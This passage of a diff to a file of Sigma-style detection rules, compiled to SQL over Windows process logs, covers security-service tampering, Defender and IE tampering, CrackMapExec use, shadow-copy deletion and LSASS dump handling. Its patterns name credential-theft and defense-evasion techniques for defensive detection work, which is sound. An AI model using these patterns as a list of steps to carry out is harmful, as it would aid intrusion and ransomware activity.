'%AVP1%' ESCAPE '\\' OR CommandLine LIKE '%BackupExec%' ESCAPE '\\' OR CommandLine LIKE '%bedbg%' ESCAPE '\\' OR CommandLine LIKE '%BITS%' ESCAPE '\\' OR CommandLine LIKE '%BrokerInfrastructure%' ESCAPE '\\' OR CommandLine LIKE '%Client Agent 7.60%' ESCAPE '\\' OR CommandLine LIKE '%Core Browsing Protection%' ESCAPE '\\' OR CommandLine LIKE '%Core Mail Protection%' ESCAPE '\\' OR CommandLine LIKE '%Core Scanning Server%' ESCAPE '\\' OR CommandLine LIKE '%DCAgent%' ESCAPE '\\' OR CommandLine LIKE '%EhttpSr%' ESCAPE '\\' OR CommandLine LIKE '%ekrn%' ESCAPE '\\' OR CommandLine LIKE '%Enterprise Client Service%' ESCAPE '\\' OR CommandLine LIKE '%epag%' ESCAPE '\\' OR CommandLine LIKE '%EPIntegrationService%' ESCAPE '\\' OR CommandLine LIKE '%EPProtectedService%' ESCAPE '\\' OR CommandLine LIKE 
'%EPRedline%' ESCAPE '\\' OR CommandLine LIKE '%EPSecurityService%' ESCAPE '\\' OR CommandLine LIKE '%EPUpdateService%' ESCAPE '\\' OR CommandLine LIKE '%EraserSvc11710%' ESCAPE '\\' OR CommandLine LIKE '%EsgShKernel%' ESCAPE '\\' OR CommandLine LIKE '%ESHASRV%' ESCAPE '\\' OR CommandLine LIKE '%FA\\_Scheduler%' ESCAPE '\\' OR CommandLine LIKE '%FirebirdGuardianDefaultInstance%' ESCAPE '\\' OR CommandLine LIKE '%FirebirdServerDefaultInstance%' ESCAPE '\\' OR CommandLine LIKE '%HealthTLService%' ESCAPE '\\' OR CommandLine LIKE '%HISSQLFDLauncherSSHAREPOINIT%' ESCAPE '\\' OR CommandLine LIKE '%hmpalertsvc%' ESCAPE '\\' OR CommandLine LIKE '%HMS%' ESCAPE '\\' OR CommandLine LIKE '%IISAdmin%' ESCAPE '\\' OR CommandLine LIKE '%IMANSVC%' ESCAPE '\\' OR CommandLine LIKE '%IMAP4Svc%' ESCAPE '\\' OR CommandLine LIKE '%KAVFS%' ESCAPE '\\' OR CommandLine LIKE '%KAVFSGT%' ESCAPE '\\' OR CommandLine LIKE '%kavfsslp%' ESCAPE '\\' OR CommandLine LIKE '%klbackupdisk%' ESCAPE '\\' OR CommandLine LIKE '%klbackupflt%' ESCAPE '\\' OR CommandLine LIKE '%klflt%' ESCAPE '\\' OR CommandLine LIKE '%klhk%' ESCAPE '\\' OR CommandLine LIKE '%KLIF%' ESCAPE '\\' OR CommandLine LIKE '%klim6%' ESCAPE '\\' OR CommandLine LIKE '%klkbdflt%' ESCAPE '\\' OR CommandLine LIKE '%klmouflt%' ESCAPE '\\' OR CommandLine LIKE '%klnagent%' ESCAPE '\\' OR CommandLine LIKE '%klpd%' ESCAPE '\\' OR CommandLine LIKE '%kltap%' ESCAPE '\\' OR CommandLine LIKE '%KSDE1.0.0%' ESCAPE '\\' OR CommandLine LIKE '%LogProcessorService%' ESCAPE '\\' OR CommandLine LIKE '%M8EndpointAgent%' ESCAPE '\\' OR CommandLine LIKE '%macmnsvc%' ESCAPE '\\' OR CommandLine LIKE '%masvc%' ESCAPE '\\' OR CommandLine LIKE '%MBAMService%' ESCAPE '\\' OR CommandLine LIKE '%MBCloudEA%' ESCAPE '\\' OR CommandLine LIKE '%MBEndpointAgent%' ESCAPE '\\' OR CommandLine LIKE '%McAfeeDLPAgentService%' ESCAPE '\\' OR CommandLine LIKE '%McAfeeEngineService%' ESCAPE '\\' OR CommandLine LIKE '%MCAFEEEVENTPARSERSRV%' ESCAPE '\\' OR CommandLine LIKE 
'%McAfeeFramework%' ESCAPE '\\' OR CommandLine LIKE '%MCAFEETOMCATSRV530%' ESCAPE '\\' OR CommandLine LIKE '%McShield%' ESCAPE '\\' OR CommandLine LIKE '%McTaskManager%' ESCAPE '\\' OR CommandLine LIKE '%mfefire%' ESCAPE '\\' OR CommandLine LIKE '%mfemms%' ESCAPE '\\' OR CommandLine LIKE '%mfevto%' ESCAPE '\\' OR CommandLine LIKE '%mfevtp%' ESCAPE '\\' OR CommandLine LIKE '%mfewc%' ESCAPE '\\' OR CommandLine LIKE '%MMS%' ESCAPE '\\' OR CommandLine LIKE '%mozyprobackup%' ESCAPE '\\' OR CommandLine LIKE '%MsDtsServer%' ESCAPE '\\' OR CommandLine LIKE '%MSExchange%' ESCAPE '\\' OR CommandLine LIKE '%msftesq1SPROO%' ESCAPE '\\' OR CommandLine LIKE '%msftesql$PROD%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$SQL\\_2008%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$SYSTEM\\_BGC%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$TPS%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$TPSAMA%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAPSTPS%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAPSTPSAMA%' ESCAPE '\\' OR CommandLine LIKE '%MSSQ!I.SPROFXENGAGEMEHT%' ESCAPE '\\' OR CommandLine LIKE '%MSSQ0SHAREPOINT%' ESCAPE '\\' OR CommandLine LIKE '%MSSQ0SOPHOS%' ESCAPE '\\' OR CommandLine LIKE '%MSSQL%' ESCAPE '\\' OR CommandLine LIKE '%MySQL%' ESCAPE '\\' OR CommandLine LIKE '%NanoServiceMain%' ESCAPE '\\' OR CommandLine LIKE '%NetMsmqActivator%' ESCAPE '\\' OR CommandLine LIKE '%ntrtscan%' ESCAPE '\\' OR CommandLine LIKE '%ofcservice%' ESCAPE '\\' OR CommandLine LIKE '%Online Protection System%' ESCAPE '\\' OR CommandLine LIKE '%OracleClientCache80%' ESCAPE '\\' OR CommandLine LIKE '%PandaAetherAgent%' ESCAPE '\\' OR CommandLine LIKE '%PccNTUpd%' ESCAPE '\\' OR CommandLine LIKE '%PDVFSService%' ESCAPE '\\' OR CommandLine LIKE '%POP3Svc%' ESCAPE '\\' OR CommandLine LIKE '%POVFSService%' ESCAPE '\\' OR CommandLine LIKE '%PSUAService%' ESCAPE '\\' OR CommandLine LIKE '%Quick Update Service%' ESCAPE '\\' OR CommandLine LIKE '%RepairService%' ESCAPE '\\' OR CommandLine LIKE '%ReportServer%' ESCAPE '\\' OR 
CommandLine LIKE '%ReportServer$%' ESCAPE '\\' OR CommandLine LIKE '%RESvc%' ESCAPE '\\' OR CommandLine LIKE '%RpcEptMapper%' ESCAPE '\\' OR CommandLine LIKE '%sacsvr%' ESCAPE '\\' OR CommandLine LIKE '%SamSs%' ESCAPE '\\' OR CommandLine LIKE '%SAVAdminService%' ESCAPE '\\' OR CommandLine LIKE '%SAVService%' ESCAPE '\\' OR CommandLine LIKE '%ScSecSvc%' ESCAPE '\\' OR CommandLine LIKE '%SDRSVC%' ESCAPE '\\' OR CommandLine LIKE '%SentinelAgent%' ESCAPE '\\' OR CommandLine LIKE '%SentinelHelperService%' ESCAPE '\\' OR CommandLine LIKE '%SepMasterService%' ESCAPE '\\' OR CommandLine LIKE '%ShMonitor%' ESCAPE '\\' OR CommandLine LIKE '%Smcinst%' ESCAPE '\\' OR CommandLine LIKE '%SmcService%' ESCAPE '\\' OR CommandLine LIKE '%SMTPSvc%' ESCAPE '\\' OR CommandLine LIKE '%SNAC%' ESCAPE '\\' OR CommandLine LIKE '%SntpService%' ESCAPE '\\' OR CommandLine LIKE '%Sophos%' ESCAPE '\\' OR CommandLine LIKE '%SQ1SafeOLRService%' ESCAPE '\\' OR CommandLine LIKE '%SQL Backups%' ESCAPE '\\' OR CommandLine LIKE '%SQL Server%' ESCAPE '\\' OR CommandLine LIKE '%SQLAgent%' ESCAPE '\\' OR CommandLine LIKE '%SQLBrowser%' ESCAPE '\\' OR CommandLine LIKE '%SQLsafe%' ESCAPE '\\' OR CommandLine LIKE '%SQLSERVERAGENT%' ESCAPE '\\' OR CommandLine LIKE '%SQLTELEMETRY%' ESCAPE '\\' OR CommandLine LIKE '%SQLWriter%' ESCAPE '\\' OR CommandLine LIKE '%SSISTELEMETRY130%' ESCAPE '\\' OR CommandLine LIKE '%SstpSvc%' ESCAPE '\\' OR CommandLine LIKE '%svcGenericHost%' ESCAPE '\\' OR CommandLine LIKE '%swc\\_service%' ESCAPE '\\' OR CommandLine LIKE '%swi\\_filter%' ESCAPE '\\' OR CommandLine LIKE '%swi\\_service%' ESCAPE '\\' OR CommandLine LIKE '%swi\\_update%' ESCAPE '\\' OR CommandLine LIKE '%Symantec%' ESCAPE '\\' OR CommandLine LIKE '%Telemetryserver%' ESCAPE '\\' OR CommandLine LIKE '%ThreatLockerService%' ESCAPE '\\' OR CommandLine LIKE '%TMBMServer%' ESCAPE '\\' OR CommandLine LIKE '%TmCCSF%' ESCAPE '\\' OR CommandLine LIKE '%TmFilter%' ESCAPE '\\' OR CommandLine LIKE '%TMiCRCScanService%' ESCAPE 
'\\' OR CommandLine LIKE '%tmlisten%' ESCAPE '\\' OR CommandLine LIKE '%TMLWCSService%' ESCAPE '\\' OR CommandLine LIKE '%TmPfw%' ESCAPE '\\' OR CommandLine LIKE '%TmPreFilter%' ESCAPE '\\' OR CommandLine LIKE '%TmProxy%' ESCAPE '\\' OR CommandLine LIKE '%TMSmartRelayService%' ESCAPE '\\' OR CommandLine LIKE '%tmusa%' ESCAPE '\\' OR CommandLine LIKE '%Trend Micro Deep Security Manager%' ESCAPE '\\' OR CommandLine LIKE '%TrueKey%' ESCAPE '\\' OR CommandLine LIKE '%UI0Detect%' ESCAPE '\\' OR CommandLine LIKE '%UTODetect%' ESCAPE '\\' OR CommandLine LIKE '%Veeam%' ESCAPE '\\' OR CommandLine LIKE '%VeemaDep/oySvc%' ESCAPE '\\' OR CommandLine LIKE '%Veritas System Recovery%' ESCAPE '\\' OR CommandLine LIKE '%VSApiNt%' ESCAPE '\\' OR CommandLine LIKE '%VSS%' ESCAPE '\\' OR CommandLine LIKE '%W3Svc%' ESCAPE '\\' OR CommandLine LIKE '%wbengine%' ESCAPE '\\' OR CommandLine LIKE '%WdNisSvc%' ESCAPE '\\' OR CommandLine LIKE '%WeanClOudSve%' ESCAPE '\\' OR CommandLine LIKE '%Weems JY%' ESCAPE '\\' OR CommandLine LIKE '%WinDefend%' ESCAPE '\\' OR CommandLine LIKE '%wozyprobackup%' ESCAPE '\\' OR CommandLine LIKE '%WRSVC%' ESCAPE '\\' OR CommandLine LIKE '%Zoolz 2 Service%' ESCAPE '\\') AND ((((OriginalFileName IN ('net.exe', 'net1.exe') OR (NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\')) AND CommandLine LIKE '% stop %' ESCAPE '\\') OR ((OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll') OR (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\')) AND (CommandLine LIKE '%Stop-Service %' ESCAPE '\\' OR CommandLine LIKE '%Remove-Service %' ESCAPE '\\'))) OR ((OriginalFileName = 'sc.exe' OR NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\') AND (CommandLine LIKE '% stop %' ESCAPE '\\' OR CommandLine LIKE '% delete %' ESCAPE '\\' OR CommandLine LIKE '% pause %' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_cmd_assoc_tamper_exe_file_association.yml" + "filename": 
"proc_creation_win_susp_service_tamper.yml" }, { - "title": "Suspicious Windows Defender Registry Key Tampering Via Reg.EXE", - "id": "452bce90-6fb0-43cc-97a5-affc283139b3", + "title": "Potential Execution of Sysinternals Tools", + "id": "7cccd811-7ae9-4ebe-9afd-cb5c406b824b", "status": "experimental", - "description": "Detects the usage of \"reg.exe\" to tamper with different Windows defender registry keys in order to disable some important features related to protection and detection", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects command lines that contain the 'accepteula' flag which could be a sign of execution of one of the Sysinternals tools", + "author": "Markus Neis", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.resource_development", + "attack.t1588.002" ], "falsepositives": [ - "Rare legitimate use by administrators to test software (should always be investigated)" + "Legitimate use of SysInternals tools", + "Programs that use the same command line flag" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' OR CommandLine LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\')) AND ((CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '% /d 0%' ESCAPE '\\' AND (CommandLine LIKE '%Real-Time Protection%' ESCAPE '\\' OR CommandLine LIKE '%TamperProtection%' ESCAPE '\\')) OR (CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '% /d 1%' ESCAPE '\\' AND CommandLine LIKE '%Notification\\_Suppress%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '% -accepteula%' ESCAPE '\\' OR CommandLine LIKE '% /accepteula%' ESCAPE '\\'))" ], - "filename": 
"proc_creation_win_reg_defender_tampering.yml" + "filename": "proc_creation_win_sysinternals_eula_accepted.yml" }, { - "title": "Suspicious XOR Encoded PowerShell Command", - "id": "bb780e0c-16cf-4383-8383-1e5471db6cf9", + "title": "Disabled IE Security Features", + "id": "fb50eb7a-5ab1-43ae-bcc9-091818cb8424", "status": "test", - "description": "Detects presence of a potentially xor encoded powershell command", - "author": "Sami Ruohonen, Harish Segar, Tim Shelton, Teymur Kheirkhabarov, Vasiliy Burov, oscd.community, Nasreddine Bencherchali", + "description": "Detects command lines that indicate unwanted modifications to registry keys that disable important Internet Explorer security features", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.execution", - "attack.t1059.001", - "attack.t1140", - "attack.t1027" + "attack.t1562.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll') OR Description = 'Windows PowerShell' OR Product = 'PowerShell Core 6') AND CommandLine LIKE '%bxor%' ESCAPE '\\' AND (CommandLine LIKE '%ForEach%' ESCAPE '\\' OR CommandLine LIKE '%for(%' ESCAPE '\\' OR CommandLine LIKE '%for %' ESCAPE '\\' OR CommandLine LIKE '%-join %' ESCAPE '\\' OR CommandLine LIKE '%-join''%' ESCAPE '\\' OR CommandLine LIKE '%-join\"%' ESCAPE '\\' OR CommandLine LIKE '%-join`%' ESCAPE '\\' OR CommandLine LIKE '%::Join%' ESCAPE '\\' OR CommandLine LIKE '%[char]%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '% -name IEHarden %' ESCAPE '\\' AND CommandLine LIKE '% -value 0 %' ESCAPE '\\') OR (CommandLine LIKE '% -name DEPOff %' ESCAPE '\\' AND CommandLine LIKE '% -value 1 %' ESCAPE '\\') OR 
(CommandLine LIKE '% -name DisableFirstRunCustomize %' ESCAPE '\\' AND CommandLine LIKE '% -value 2 %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_xor_commandline.yml" + "filename": "proc_creation_win_powershell_disable_ie_features.yml" }, { - "title": "Suspicious Where Execution", - "id": "725a9768-0f5e-4cb3-aec2-bc5719c6831a", - "status": "experimental", - "description": "Adversaries may enumerate browser bookmarks to learn more about compromised hosts.\nBrowser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about\ninternal network resources such as servers, tools/dashboards, or other related infrastructure.\n", - "author": "frack113, Nasreddine Bencherchali", - "tags": [ - "attack.discovery", - "attack.t1217" - ], + "title": "HackTool - CrackMapExec Execution", + "id": "42a993dd-bb3e-48c8-b372-4d6684c4106c", + "status": "test", + "description": "This rule detect common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced.", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\where.exe' ESCAPE '\\' OR OriginalFileName = 'where.exe') AND (CommandLine LIKE '%places.sqlite%' ESCAPE '\\' OR CommandLine LIKE '%cookies.sqlite%' ESCAPE '\\' OR CommandLine LIKE '%formhistory.sqlite%' ESCAPE '\\' OR CommandLine LIKE '%logins.json%' ESCAPE '\\' OR CommandLine LIKE '%key4.db%' ESCAPE '\\' OR CommandLine LIKE '%key3.db%' ESCAPE '\\' OR CommandLine LIKE '%sessionstore.jsonlz4%' ESCAPE '\\' OR CommandLine LIKE '%History%' ESCAPE '\\' OR CommandLine LIKE '%Bookmarks%' ESCAPE '\\' OR CommandLine LIKE '%Cookies%' ESCAPE '\\' OR CommandLine LIKE '%Login Data%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND 
((NewProcessName LIKE '%\\\\crackmapexec.exe' ESCAPE '\\' OR CommandLine LIKE '% -M pe\\_inject %' ESCAPE '\\' OR (CommandLine LIKE '% --local-auth%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -x %' ESCAPE '\\') OR (CommandLine LIKE '% --local-auth%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% -H ''NTHASH''%' ESCAPE '\\') OR (CommandLine LIKE '% mssql %' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% -M %' ESCAPE '\\' AND CommandLine LIKE '% -d %' ESCAPE '\\') OR (CommandLine LIKE '% smb %' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -H %' ESCAPE '\\' AND CommandLine LIKE '% -M %' ESCAPE '\\' AND CommandLine LIKE '% -o %' ESCAPE '\\') OR (CommandLine LIKE '% smb %' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% --local-auth%' ESCAPE '\\')) OR (CommandLine LIKE '% --local-auth%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% 10.%' ESCAPE '\\' AND CommandLine LIKE '% 192.168.%' ESCAPE '\\' AND CommandLine LIKE '%/24 %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_where_browser_data_recon.yml" + "filename": "proc_creation_win_hktl_crackmapexec_execution.yml" }, { - "title": "Execute MSDT Via Answer File", - "id": "9c8c7000-3065-44a8-a555-79bcba5d9955", + "title": "Suspicious Regsvr32 Execution With Image Extension", + "id": "089fc3d2-71e8-4763-a8a5-c97fbb0a403e", "status": "experimental", - "description": "Detects execution of \"msdt.exe\" using an answer file which is simulating the legitimate way of calling msdt via \"pcwrun.exe\" (For example from the compatibility tab)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the execution of REGSVR32.exe with DLL files 
masquerading as image files", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1218", - "attack.execution" + "attack.t1218.010" ], "falsepositives": [ - "Possible undocumented parents of \"msdt\" other than \"pcwrun\"" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\WINDOWS\\\\diagnostics\\\\index\\\\PCWDiagnostic.xml%' ESCAPE '\\' AND (CommandLine LIKE '% -af %' ESCAPE '\\' OR CommandLine LIKE '% /af %' ESCAPE '\\')) AND NOT (ParentProcessName LIKE '%\\\\pcwrun.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\REGSVR32.EXE' ESCAPE '\\') AND (CommandLine LIKE '%.bmp' ESCAPE '\\' OR CommandLine LIKE '%.cr2' ESCAPE '\\' OR CommandLine LIKE '%.eps' ESCAPE '\\' OR CommandLine LIKE '%.gif' ESCAPE '\\' OR CommandLine LIKE '%.ico' ESCAPE '\\' OR CommandLine LIKE '%.jpeg' ESCAPE '\\' OR CommandLine LIKE '%.jpg' ESCAPE '\\' OR CommandLine LIKE '%.nef' ESCAPE '\\' OR CommandLine LIKE '%.orf' ESCAPE '\\' OR CommandLine LIKE '%.png' ESCAPE '\\' OR CommandLine LIKE '%.raw' ESCAPE '\\' OR CommandLine LIKE '%.sr2' ESCAPE '\\' OR CommandLine LIKE '%.tif' ESCAPE '\\' OR CommandLine LIKE '%.tiff' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_msdt_answer_file.yml" + "filename": "proc_creation_win_regsvr32_image.yml" }, { - "title": "New Kernel Driver Via SC.EXE", - "id": "431a1fdb-4799-4f3b-91c3-a683b003fc49", + "title": "Deletion of Volume Shadow Copies via WMI with PowerShell", + "id": "21ff4ca9-f13a-41ad-b828-0077b2af2e40", "status": "experimental", - "description": "Detects creation of a new service (kernel driver) with the type \"kernel\"", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects deletion of Windows Volume Shadow Copies with 
PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil", + "author": "Tim Rauch", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1543.003" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Rare legitimate installation of kernel drivers via sc.exe" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' AND (CommandLine LIKE '%create%' ESCAPE '\\' OR CommandLine LIKE '%config%' ESCAPE '\\') AND CommandLine LIKE '%binPath%' ESCAPE '\\' AND CommandLine LIKE '%type%' ESCAPE '\\' AND CommandLine LIKE '%kernel%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%Get-WmiObject%' ESCAPE '\\' OR CommandLine LIKE '%gwmi%' ESCAPE '\\' OR CommandLine LIKE '%Get-CimInstance%' ESCAPE '\\' OR CommandLine LIKE '%gcim%' ESCAPE '\\') AND CommandLine LIKE '%Win32\\_Shadowcopy%' ESCAPE '\\' AND (CommandLine LIKE '%.Delete()%' ESCAPE '\\' OR CommandLine LIKE '%Remove-WmiObject%' ESCAPE '\\' OR CommandLine LIKE '%rwmi%' ESCAPE '\\' OR CommandLine LIKE '%Remove-CimInstance%' ESCAPE '\\' OR CommandLine LIKE '%rcim%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sc_new_kernel_driver.yml" + "filename": "proc_creation_win_powershell_shadowcopy_deletion.yml" }, { - "title": "Suspicious Hacktool Execution - PE Metadata", - "id": "37c1333a-a0db-48be-b64b-7393b2386e3b", - "status": "experimental", - "description": "Detects the execution of different Windows based hacktools via PE metadata (company, product, etc.) 
even if the files have been renamed", + "title": "Potential Procdump Evasion", + "id": "79b06761-465f-4f88-9ef2-150e24d3d737", + "status": "test", + "description": "Detects uses of the SysInternals Procdump utility in which procdump or its output get renamed or a dump file is moved ot copied to a different name", "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.t1036", + "attack.t1003.001" + ], "falsepositives": [ - "Unlikely" + "Cases in which procdump just gets copied to a different directory without any renaming" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND Company = 'Cube0x0')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%copy procdump%' ESCAPE '\\' OR CommandLine LIKE '%move procdump%' ESCAPE '\\') OR (CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '%.dmp %' ESCAPE '\\' AND (CommandLine LIKE '%2.dmp%' ESCAPE '\\' OR CommandLine LIKE '%lsass%' ESCAPE '\\' OR CommandLine LIKE '%out.dmp%' ESCAPE '\\')) OR (CommandLine LIKE '%copy lsass.exe\\_%' ESCAPE '\\' OR CommandLine LIKE '%move lsass.exe\\_%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_execution_via_pe_metadata.yml" + "filename": "proc_creation_win_sysinternals_procdump_evasion.yml" }, { - "title": "Process Reconnaissance Via Wmic.EXE", - "id": "221b251a-357a-49a9-920a-271802777cc0", + "title": "AADInternals PowerShell Cmdlets Execution - ProccessCreation", + "id": "c86500e9-a645-4680-98d7-f882c70c1ea3", "status": "experimental", - "description": "Detects the execution of \"wmic\" with the \"process\" flag, which adversary might use to list processes running on the compromised host or list installed software hotfixes and patches.", - "author": "frack113", + "description": "Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. 
Which can be abused by threat actors to attack Azure AD or Office 365.", + "author": "Austin Songer (@austinsonger), Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1047" + "attack.reconnaissance", + "attack.discovery", + "attack.credential_access", + "attack.impact" ], "falsepositives": [ - "Unknown" + "Legitimate use of the library for administrative activity" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\WMIC.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND CommandLine LIKE '%process%' ESCAPE '\\') AND NOT (CommandLine LIKE '%call%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.Exe', 'pwsh.dll')) AND (CommandLine LIKE '%Add-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%ConvertTo-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Disable-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Enable-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Export-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Get-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Grant-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Install-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Join-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%New-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Open-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Read-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Register-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Remove-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Restore-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Search-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Send-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Set-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Start-AADInt%' ESCAPE '\\' OR CommandLine 
LIKE '%Update-AADInt%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wmic_recon_process.yml" + "filename": "proc_creation_win_powershell_aadinternals_cmdlets_execution.yml" }, { - "title": "UAC Bypass Using MSConfig Token Modification - Process", - "id": "ad92e3f9-7eb6-460e-96b1-582b0ccbb980", - "status": "test", - "description": "Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)", - "author": "Christian Burkard (Nextron Systems)", + "title": "Renamed Vmnat.exe Execution", + "id": "7b4f794b-590a-4ad4-ba18-7964a2832205", + "status": "experimental", + "description": "Detects renamed vmnat.exe or portable version that can be used for DLL side-loading", + "author": "elhoim", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND IntegrityLevel IN ('High', 'System') AND ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\pkgmgr.exe' ESCAPE '\\' AND CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\msconfig.exe\" -5' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'vmnat.exe' AND NOT ((NewProcessName LIKE '%vmnat.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_uac_bypass_msconfig_gui.yml" + "filename": "proc_creation_win_renamed_vmnat.yml" }, { - "title": "Shadow Copies Creation Using Operating Systems Utilities", - "id": "b17ea6f7-6e90-447e-a799-e6c0a493d6ce", - "status": "test", - "description": "Shadow Copies creation using operating systems utilities, possible credential access", - "author": "Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", + "title": "Suspicious Add Scheduled Task Parent", + "id": "9494479d-d994-40bf-a8b1-eea890237021", + "status": "experimental", + "description": "Detects suspicious scheduled task creations from a parent stored in a temporary 
